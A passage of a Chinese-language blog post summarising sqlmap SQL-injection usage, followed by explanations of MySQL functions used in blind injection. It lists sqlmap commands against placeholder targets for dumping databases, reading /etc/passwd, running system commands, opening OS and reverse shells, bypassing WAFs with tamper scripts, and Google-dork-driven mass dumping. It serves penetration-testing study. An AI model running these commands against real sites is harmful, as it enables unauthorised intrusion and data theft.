class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –privileges -U root / <em>查看指定用户权限sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –is-dba -v 1 /</em> 是否是数据库管理员<br>sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –roles / <em>枚举数据库用户角色sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –udf-inject /</em> 导入用户自定义函数（获取 系统权限！）<br>sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –dump-all –exclude-sysdbs -v 0 / <em>列出当前库所有表sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –union-cols /*union 查询表记录<br>sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –cookie “COOKIE_VALUE” /*cookie 注入sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> -b(–banner) /</em> 获取 banner 信息<br>sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –data “id=3” /<em>post 注入sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> -v 1 -f /</em> 指纹判别数据库类型<br>sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –proxy “<span class="exturl" data-url="aHR0cDovLzEyNy4wLjAuMTo4MTE44oCdLw==" title="http://127.0.0.1:8118”/">http://127.0.0.1:8118”<i class="fa fa-external-link"></i></span> / <em>代理注入sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –string “STRING_ON_TRUE_PAGE” /</em> 指定关键词<br>sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –sql-shell / <em>执行指定 sql 命令sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –file /etc/passwdsqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –os-cmd=whoami /</em> 执行系统命令<br>sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –os-shell / <em>系统交互 shellsqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –os-pwn /</em> 反弹 shell<br>sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –reg-read / <em>读取 win 系统注册表sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –dbs-o “sqlmap.log”/</em> 保存进度<br>sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –dbs -o “sqlmap.log” –resume /* 恢复 已保存进度</p>
<h2 id="Sqlmap使用进阶"><a href="#Sqlmap使用进阶" class="headerlink" title="Sqlmap使用进阶"></a>Sqlmap使用进阶</h2><h3 id="利用Cookies"><a href="#利用Cookies" class="headerlink" title="利用Cookies"></a>利用Cookies</h3><p>cookie “id=9”<br>在 ASP 中, request 对象获取客户端提交数据常用的是 get 和 post 两种方式, 同时 request 对象可以不通过集合来获得数据, 即直接使用”request(“name”)”. 但它效率低下, 容易出错, 当我们省略具体的集合名称时, asp 是按 QueryString(get),Form(post),Cookie,Severvariable, 集合的顺序来搜索的. cookie 是保存在客户端的一个文本文件, 可以进行修改, 这样一来, 就可以利用 Request.cookie 方式来提交变量的值, 从而利用系统的漏洞进行注入攻击</p>
<h3 id="Sqlmap表单的使用"><a href="#Sqlmap表单的使用" class="headerlink" title="Sqlmap表单的使用"></a>Sqlmap表单的使用</h3><p>表单枚举<br>./sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3d3dy54eHguY29t" title="http://www.xxx.com">http://www.xxx.com”<i class="fa fa-external-link"></i></span> –forms</p>
<p>指定表单数据<br>./sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3d3dy54eHguY29t" title="http://www.xxx.com">http://www.xxx.com”<i class="fa fa-external-link"></i></span> –data “tfUName=1&amp;UPass=1”</p>
<p>burpsuite 抓包与构造 request 请求</p>
<p>./sqlmap.py -r search_test.py -p tfUPass</p>
<h3 id="交互式shell的使用（可提权）"><a href="#交互式shell的使用（可提权）" class="headerlink" title="交互式shell的使用（可提权）"></a>交互式shell的使用（可提权）</h3><p>./sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3d3dy54eHguY29t" title="http://www.xxx.com">http://www.xxx.com”<i class="fa fa-external-link"></i></span> –os-cmd “ipconfig”</p>
<p>./sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3d3dy54eHguY29t" title="http://www.xxx.com">http://www.xxx.com”<i class="fa fa-external-link"></i></span> –os-shell</p>
<p>./sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3d3dy54eHguY29t" title="http://www.xxx.com">http://www.xxx.com”<i class="fa fa-external-link"></i></span> –os-pwn</p>
<p>./sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3d3dy54eHguY29t" title="http://www.xxx.com">http://www.xxx.com”<i class="fa fa-external-link"></i></span> –sql-shell</p>
<h3 id="配合Google-Hacking使用"><a href="#配合Google-Hacking使用" class="headerlink" title="配合Google Hacking使用"></a>配合Google Hacking使用</h3><p>-p name / <em>多个参数如 index.php?n_id=1&amp;name=2&amp;data=2020 我们想指定 name 参数进行注入sqlmap.py -g “site:xxxxx.com inurl:php?id=” –dump-all –batch /</em>google 搜索注入点自动跑出所有字段，需保证 google.com 能正常访问</p>
<h3 id="WAF绕过"><a href="#WAF绕过" class="headerlink" title="WAF绕过"></a>WAF绕过</h3><p>–batch Never ask for user input, use the default behaviour<br>–tamper=TAMPER Use given script(s) for tampering injection data<br>常见 encoder: space2hash.py, space2morehash.py, base64encode.py, charencode.py</p>
<p>例子：</p>
<p>./sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3d3dy54eHguY29t" title="http://www.xxx.com">http://www.xxx.com”<i class="fa fa-external-link"></i></span> -v 3 –dbs –batch –tamper “space2hash.py”</p>
<h3 id="智能level测试等级"><a href="#智能level测试等级" class="headerlink" title="智能level测试等级"></a>智能level测试等级</h3><p>sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3d3dy4yY3RvLmNvbS8=" title="http://www.2cto.com/">http://www.2cto.com<i class="fa fa-external-link"></i></span> /news?id=1” –smart –level 3 –users /*smart 智能 level 测试等级</p>
<h3 id="基本信息收集的SQL语句"><a href="#基本信息收集的SQL语句" class="headerlink" title="基本信息收集的SQL语句"></a>基本信息收集的SQL语句</h3><h4 id="oracle"><a href="#oracle" class="headerlink" title="oracle"></a>oracle</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#96;select table_name,row_nums from user_tables order by row_nums desc [where table_name like &#39;%%&#39;]查询前10条select * from [table_name] where numrow&lt;&#x3D;10&#96;</span><br></pre></td></tr></table></figure>

<h4 id="mysql"><a href="#mysql" class="headerlink" title="mysql"></a>mysql</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#96;select table_name from information_schema.tables [where table_name like &#39;%%&#39;]查询前10条select * from [table_name] limit 10&#96;</span><br></pre></td></tr></table></figure>

<h4 id="Sqlserver"><a href="#Sqlserver" class="headerlink" title="Sqlserver"></a>Sqlserver</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#96;select a.name,b.rows from sysobjects a with(nolock) join sysindexes b on b.id&#x3D;a.id where a.xtype&#x3D;&#39;u&#39; and b.indid in (0,1) order by b.rows desc查询前10条select top 10 * from [table_name]&#96;</span><br></pre></td></tr></table></figure>

<h2 id="Sqlmap盲注过程相关的函数及使用方法"><a href="#Sqlmap盲注过程相关的函数及使用方法" class="headerlink" title="Sqlmap盲注过程相关的函数及使用方法"></a>Sqlmap盲注过程相关的函数及使用方法</h2><h4 id="mid"><a href="#mid" class="headerlink" title="mid()"></a>mid()</h4><p>–从文本字段中提取字符</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT MID(column_name,start[,length]) FROM table_name;</span><br></pre></td></tr></table></figure>

<p>column_name：要提取字符串的字段内容</p>
<p>start：必需，规定起始位置（值为1）</p>
<p>length可选，代表长度；如果省略，则返回剩余的文本内容</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select mid(adnumber,1,2)from address_list;</span><br><span class="line">+-------------------+</span><br><span class="line">| mid(adnumber,1,2) |</span><br><span class="line">+-------------------+</span><br><span class="line">| 31                |</span><br><span class="line">| 31                |</span><br><span class="line">| 31                |</span><br><span class="line">| 31                |</span><br><span class="line">| 31                |</span><br><span class="line">+-------------------+</span><br><span class="line">5 rows in set (0.01 sec)</span><br><span class="line">mysql&gt; select mid(adnumber,1,3)from address_list;</span><br><span class="line">+-------------------+</span><br><span class="line">| mid(adnumber,1,3) |</span><br><span class="line">+-------------------+</span><br><span class="line">| 311               |</span><br><span class="line">| 311               |</span><br><span class="line">| 311               |</span><br><span class="line">| 311               |</span><br><span class="line">| 311               |</span><br><span class="line">+-------------------+</span><br><span class="line">5 rows in set (0.00 sec)</span><br><span class="line">mysql&gt; select mid(adnumber,2,3)from address_list;</span><br><span class="line">+-------------------+</span><br><span class="line">| mid(adnumber,2,3) |</span><br><span class="line">+-------------------+</span><br><span class="line">| 117               |</span><br><span class="line">| 117               |</span><br><span class="line">| 117               |</span><br><span class="line">| 117               |</span><br><span class="line">| 117               |</span><br><span class="line">+-------------------+</span><br><span class="line">5 rows in set (0.00 sec)</span><br></pre></td></tr></table></figure>

<h4 id="limit"><a href="#limit" class="headerlink" title="limit()"></a>limit()</h4><p>–返回前几条或者中间某几行数据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from table limit m,n;</span><br></pre></td></tr></table></figure>

<p>从第m条记录开始返回n条记录</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select * from user limit 1,2;</span><br><span class="line">+----+----------+----------+------------+-----------+---------------------+</span><br><span class="line">| id | username | password | number     | classinfo | createdata          |</span><br><span class="line">+----+----------+----------+------------+-----------+---------------------+</span><br><span class="line">| 82 | 5555     | 123456   | 311700     | 177777    | 2019-07-06 20:45:50 |</span><br><span class="line">| 83 | 9999     | 123456   | 311700     | 1777777   | 2019-07-06 20:46:14 |</span><br><span class="line">+----+----------+----------+------------+-----------+---------------------+</span><br><span class="line">2 rows in set (0.00 sec)</span><br><span class="line">mysql&gt; select * from user limit 1,3;</span><br><span class="line">+----+----------+----------+------------+-----------+---------------------+</span><br><span class="line">| id | username | password | number     | classinfo | createdata          |</span><br><span class="line">+----+----------+----------+------------+-----------+---------------------+</span><br><span class="line">| 82 | 5555     | 123456   | 3117       | 1777777   | 2019-07-06 20:45:50 |</span><br><span class="line">| 83 | 9999     | 123456   | 311700     | 1777777   | 2019-07-06 20:46:14 |</span><br><span class="line">| 84 | 安卓大神  | 123456   | 311700     | 17777777  | 2019-07-06 20:46:50 |</span><br><span class="line">+----+----------+----------+------------+-----------+---------------------+</span><br><span class="line">3 rows in set (0.00 sec)</span><br></pre></td></tr></table></figure>

<h4 id="concat、concat-ws、group-concat"><a href="#concat、concat-ws、group-concat" class="headerlink" title="concat、concat_ws、group_concat"></a>concat、concat_ws、group_concat</h4><p>concat函数在连接字符串的时候，只要其中一个是NULL,那么将返回NULL</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select concat(&#39;123&#39;,null);</span><br><span class="line">+--------------------+</span><br><span class="line">| concat(&#39;123&#39;,null) |</span><br><span class="line">+--------------------+</span><br><span class="line">| NULL               |</span><br><span class="line">+--------------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br><span class="line">mysql&gt; select concat(&#39;123&#39;,&#39;123456&#39;);</span><br><span class="line">+------------------------+</span><br><span class="line">| concat(&#39;123&#39;,&#39;123456&#39;) |</span><br><span class="line">+------------------------+</span><br><span class="line">| 123123456              |</span><br><span class="line">+------------------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br></pre></td></tr></table></figure>

<p>concat_ws函数在执行的时候,不会因为NULL值而返回NULL</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select concat_ws(&#39;123&#39;,null);</span><br><span class="line">+-----------------------+</span><br><span class="line">| concat_ws(&#39;123&#39;,null) |</span><br><span class="line">+-----------------------+</span><br><span class="line">|                       |</span><br><span class="line">+-----------------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br><span class="line">mysql&gt; select concat_ws(&#39;123&#39;,&#39;456789&#39;);</span><br><span class="line">+---------------------------+</span><br><span class="line">| concat_ws(&#39;123&#39;,&#39;456789&#39;) |</span><br><span class="line">+---------------------------+</span><br><span class="line">| 456789                    |</span><br><span class="line">+---------------------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br><span class="line">mysql&gt; select concat_ws(&#39;.&#39;,&#39;123&#39;,&#39;456789&#39;);</span><br><span class="line">+-------------------------------+</span><br><span class="line">| concat_ws(&#39;.&#39;,&#39;123&#39;,&#39;456789&#39;) |</span><br><span class="line">+-------------------------------+</span><br><span class="line">| 123.456789                    |</span><br><span class="line">+-------------------------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br></pre></td></tr></table></figure>

<h4 id="Count"><a href="#Count" class="headerlink" title="Count()"></a>Count()</h4><p>–聚集函数，统计元祖的个数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select count(*) from user;</span><br><span class="line">+----------+</span><br><span class="line">| count(*) |</span><br><span class="line">+----------+</span><br><span class="line">|        4 |</span><br><span class="line">+----------+</span><br><span class="line">1 row in set (0.00 sec)</span><br></pre></td></tr></table></figure>

<h4 id="rand"><a href="#rand" class="headerlink" title="rand()"></a>rand()</h4><p>–用于产生一个0~1的随机数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select rand(),rand();</span><br><span class="line">+--------------------+---------------------+</span><br><span class="line">| rand()             | rand()              |</span><br><span class="line">+--------------------+---------------------+</span><br><span class="line">| 0.4360487893559493 | 0.24646534328019745 |</span><br><span class="line">+--------------------+---------------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br></pre></td></tr></table></figure>

<h4 id="group-by"><a href="#group-by" class="headerlink" title="group by"></a>group by</h4><p>–依据我们想要的规则对结果进行分组</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select * from user group by username;</span><br><span class="line">+----+----------+----------+------------+-----------+---------------------+</span><br><span class="line">| id | username | password | number     | classinfo | createdata          |</span><br><span class="line">+----+----------+----------+------------+-----------+---------------------+</span><br><span class="line">| 82 | 5555     | 123456   | 311700     | 11111111  | 2019-07-06 20:45:50 |</span><br><span class="line">| 83 | 9999     | 123456   | 311700     | 1111111   | 2019-07-06 20:46:14 |</span><br><span class="line">| 81 | 古       | 123456   | 311700     | 1111111   | 2019-07-06 20:28:13 |</span><br><span class="line">| 84 | 大神     | 123456   | 311700     | 1111111   | 2019-07-06 20:46:50 |</span><br><span class="line">+----+----------+----------+------------+-----------+---------------------+</span><br><span class="line">4 rows in set (0.00 sec)</span><br></pre></td></tr></table></figure>

<h4 id="length"><a href="#length" class="headerlink" title="length()"></a>length()</h4><p>–返回字符串的长度</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select length(&#39;xianzhi&#39;);</span><br><span class="line">+-------------------+</span><br><span class="line">| length(&#39;xianzhi&#39;) |</span><br><span class="line">+-------------------+</span><br><span class="line">|                 7 |</span><br><span class="line">+-------------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br><span class="line">mysql&gt; select * from user where length(username)&#x3D;4;</span><br><span class="line">+----+----------+----------+------------+-----------+---------------------+</span><br><span class="line">| id | username | password | number     | classinfo | createdata          |</span><br><span class="line">+----+----------+----------+------------+-----------+---------------------+</span><br><span class="line">| 82 | 5555     | 123456   | 3117004597 | 170806    | 2019-07-06 20:45:50 |</span><br><span class="line">| 83 | 9999     | 123456   | 3117004598 | 170806    | 2019-07-06 20:46:14 |</span><br><span class="line">+----+----------+----------+------------+-----------+---------------------+</span><br><span class="line">2 rows in set (0.00 sec)</span><br></pre></td></tr></table></figure>

<h4 id="Substr"><a href="#Substr" class="headerlink" title="Substr()"></a>Substr()</h4><p>–截取字符串</p>
<p>三个参数 （所要截取字符串，截取的位置，截取的长度）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select substr(&#39;abcdefghijk&#39;,4,8);</span><br><span class="line">+---------------------------+</span><br><span class="line">| substr(&#39;abcdefghijk&#39;,4,8) |</span><br><span class="line">+---------------------------+</span><br><span class="line">| defghijk                  |</span><br><span class="line">+---------------------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br><span class="line">mysql&gt; select substr(username,1,2)from user;</span><br><span class="line">+----------------------+</span><br><span class="line">| substr(username,1,2) |</span><br><span class="line">+----------------------+</span><br><span class="line">| 古日                 |</span><br><span class="line">| 55                   |</span><br><span class="line">| 99                   |</span><br><span class="line">| 安卓                 |</span><br><span class="line">+----------------------+</span><br><span class="line">4 rows in set (0.00 sec)</span><br></pre></td></tr></table></figure>

<h4 id="Ascii"><a href="#Ascii" class="headerlink" title="Ascii()"></a>Ascii()</h4><p>–返回字符串的ascii码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select ascii(9);</span><br><span class="line">+----------+</span><br><span class="line">| ascii(9) |</span><br><span class="line">+----------+</span><br><span class="line">|       57 |</span><br><span class="line">+----------+</span><br><span class="line">1 row in set (0.00 sec)</span><br><span class="line">mysql&gt; select ascii(substr(username,1,2))from user;</span><br><span class="line">+-----------------------------+</span><br><span class="line">| ascii(substr(username,1,2)) |</span><br><span class="line">+-----------------------------+</span><br><span class="line">|                         229 |</span><br><span class="line">|                          53 |</span><br><span class="line">|                          57 |</span><br><span class="line">|                         229 |</span><br><span class="line">+-----------------------------+</span><br><span class="line">4 rows in set (0.00 sec)</span><br></pre></td></tr></table></figure>

<h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h2>
    </div>

    
    
    
        

  <div class="followme">
    <p>欢迎关注我的其它发布渠道</p>

    <div class="social-list">

            <div class="social-item">
              <a target="_blank" class="social-link" href="/atom.xml">
                <span class="icon">
                  <i class="fa fa-rss"></i>
                </span>

                <span class="label">RSS</span>
              </a>
            </div>
    </div>
  </div>


      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/SQLi/" rel="tag"><i class="fa fa-tag"></i> SQLi</a>
              <a href="/tags/SQLmap/" rel="tag"><i class="fa fa-tag"></i> SQLmap</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item"></div>
      <div class="post-nav-item">
    <a href="/2020/03/18/VulnHub-Walkthrough-%E4%B8%80/" rel="next" title="VulnHub Walkthrough(一)">
      VulnHub Walkthrough(一) <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Sqlmap使用的小小总结QAQ"><span class="nav-number">1.</span> <span class="nav-text">Sqlmap使用的小小总结QAQ</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#写在前面"><span class="nav-number">1.1.</span> <span class="nav-text">写在前面</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#先了解"><span class="nav-number">1.2.</span> <span class="nav-text">先了解</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Sqlmap支持的五种sql注入："><span class="nav-number">1.2.1.</span> <span class="nav-text">Sqlmap支持的五种sql注入：</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-基于报错的sql注入"><span class="nav-number">1.2.1.1.</span> <span class="nav-text">1.基于报错的sql注入</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1）floor报错注入"><span class="nav-number">1.2.1.1.1.</span> <span class="nav-text">1）floor报错注入</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2）UpdateXml报错注入"><span class="nav-number">1.2.1.1.2.</span> <span class="nav-text">2）UpdateXml报错注入</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#3）ExtractValue报错注入"><span class="nav-number">1.2.1.1.3.</span> <span class="nav-text">3）ExtractValue报错注入</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-基于布尔的注入"><span class="nav-number">1.2.1.2.</span> <span class="nav-text">2.基于布尔的注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-基于时间的盲注"><span class="nav-number">1.2.1.3.</span> <span class="nav-text">3.基于时间的盲注</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-联合查询注入（union-injection）"><span class="nav-number">1.2.1.4.</span> <span class="nav-text">4.联合查询注入（union injection）</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#5-堆查询注入（stack-injection）"><span class="nav-number">1.2.1.5.</span> <span class="nav-text">5.堆查询注入（stack injection）</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#安装Sqlmap"><span class="nav-number">1.3.</span> <span class="nav-text">安装Sqlmap</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Sqlmap选项（Options"><span class="nav-number">1.4.</span> <span class="nav-text">Sqlmap选项（Options)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Sqlmap基础的使用"><span class="nav-number">1.5.</span> <span class="nav-text">Sqlmap基础的使用</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Sqlmap初级使用"><span class="nav-number">1.6.</span> <span class="nav-text">Sqlmap初级使用</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Sqlmap使用进阶"><span class="nav-number">1.7.</span> <span class="nav-text">Sqlmap使用进阶</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#利用Cookies"><span class="nav-number">1.7.1.</span> <span class="nav-text">利用Cookies</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Sqlmap表单的使用"><span class="nav-number">1.7.2.</span> <span class="nav-text">Sqlmap表单的使用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#交互式shell的使用（可提权）"><span class="nav-number">1.7.3.</span> <span class="nav-text">交互式shell的使用（可提权）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#配合Google-Hacking使用"><span class="nav-number">1.7.4.</span> <span class="nav-text">配合Google Hacking使用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#WAF绕过"><span 